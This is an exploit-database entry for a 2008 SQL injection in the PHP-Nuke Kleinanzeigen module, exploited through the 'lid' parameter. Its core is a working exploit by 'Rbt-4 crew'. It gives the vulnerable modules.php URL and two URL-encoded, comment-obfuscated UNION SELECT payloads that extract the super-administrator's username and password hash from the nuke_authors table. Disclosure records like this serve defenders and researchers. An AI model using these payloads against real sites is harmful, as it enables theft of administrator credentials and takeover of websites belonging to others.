PHP-NUKE module Kleinanzeigen SQL injection (lid)

2008.08.06
Credit: lovebug
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################################################## # Rbt-4 crew # http://www.rbt-4.net # Author : Lovebug #---------------------------- # # # Remote Sql injection Php-Nuke module name Kleinanzeigen ########################################################## # modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql] # # Exploit # # username : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A # pwd : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A ##########################################################

References:

http://seclists.org/bugtraq/2008/Aug/0044.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top